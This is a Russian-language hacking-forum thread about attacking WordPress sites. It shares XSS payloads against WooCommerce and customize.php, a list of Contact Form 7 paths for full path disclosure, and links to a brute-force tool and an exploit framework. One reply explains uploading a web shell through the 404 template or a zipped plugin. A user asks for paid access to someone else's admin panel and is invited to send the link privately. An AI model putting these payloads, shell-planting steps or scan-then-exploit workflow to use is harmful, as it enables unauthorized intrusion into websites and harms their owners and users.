[ Обзор уязвимостей WordPress ]

Вот интересная бага:
http://seclists.org/fulldisclosure/2015/Feb/75
Но я до чего-то вразумительтного ее не докрутил
admin.php?page=wc-reports&";><h1>
admin.php?page=wc-reports&";><a>WOW</a>

 

https://github.com/claudioviviani/wordbrutepress

 

Contact form 7

Full Path Disclosure

wp-content/plugins/contact-form-7/includes/upgrade.php
/wp-content/plugins/contact-form-7/modules/acceptance.php
/wp-content/plugins/contact-form-7/modules/akismet.php
/wp-content/plugins/contact-form-7/modules/checkbox.php
/wp-content/plugins/contact-form-7/modules/count.php
/wp-content/plugins/contact-form-7/modules/date.php
/wp-content/plugins/contact-form-7/modules/file.php
/wp-content/plugins/contact-form-7/modules/flamingo.php
/wp-content/plugins/contact-form-7/modules/jetpack.php
/wp-content/plugins/contact-form-7/modules/listo.php
/wp-content/plugins/contact-form-7/modules/number.php
/wp-content/plugins/contact-form-7/modules/quiz.php
/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php
/wp-content/plugins/contact-form-7/modules/recaptcha.php
/wp-content/plugins/contact-form-7/modules/response.php
/wp-content/plugins/contact-form-7/modules/select.php
/wp-content/plugins/contact-form-7/modules/submit.php
/wp-content/plugins/contact-form-7/modules/text.php
/wp-content/plugins/contact-form-7/modules/textarea.php

 

https://github.com/rastating/wordpress-exploit-framework

Ruby фреймворк для эскплутации и тестирования WP
статья на английском
http://www.kitploit.com/2016/03/wordpress-exploit-framework-ruby.html

 

какие методы есть заливки шелла в wp?

 

Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.

 

WordPress Plugin Quick Page/Post Redirect Open Redirect Current plugin version: 5.1.3.
WordPress Plugin WooCommerce-excelling eCommerce Cross-Site Scripting Current plugin version: 2.3.13.

Есть чтонить под эти плагины?

 

есть что нибудь на WordPress 4.4.4 ?

 

Я нашёл токо это,но XSS ^.^
сайт.ру/wp-admin/customize.php?theme=<svg onload=alert(1)>

 

Как можно взломать WP сайт посоветуйте способы

 

Версию WP.

 

Cmsmap просканируй ,посмотри какие плагины стоят, потом ищи под них сплоит или ищи сам дыры в плагинах

 

как узнать полный путь версия 4.6

 

Доброго времени суток. Есть необходимость получить доступ к админке wordpress 4.5.2. Возможно ли такое?

 

Попробуй эксплоит найти но я посмотрел не нашёл, и проскань впсканом

 

Впскан не кажет уязвимостей... Вопрос актуален, естественно все труды будут оплачены.

 

кинь ссылку в лс

 

Вопрос по админке актуален

 

скинь в личку

 

Народ, неужели это нереально?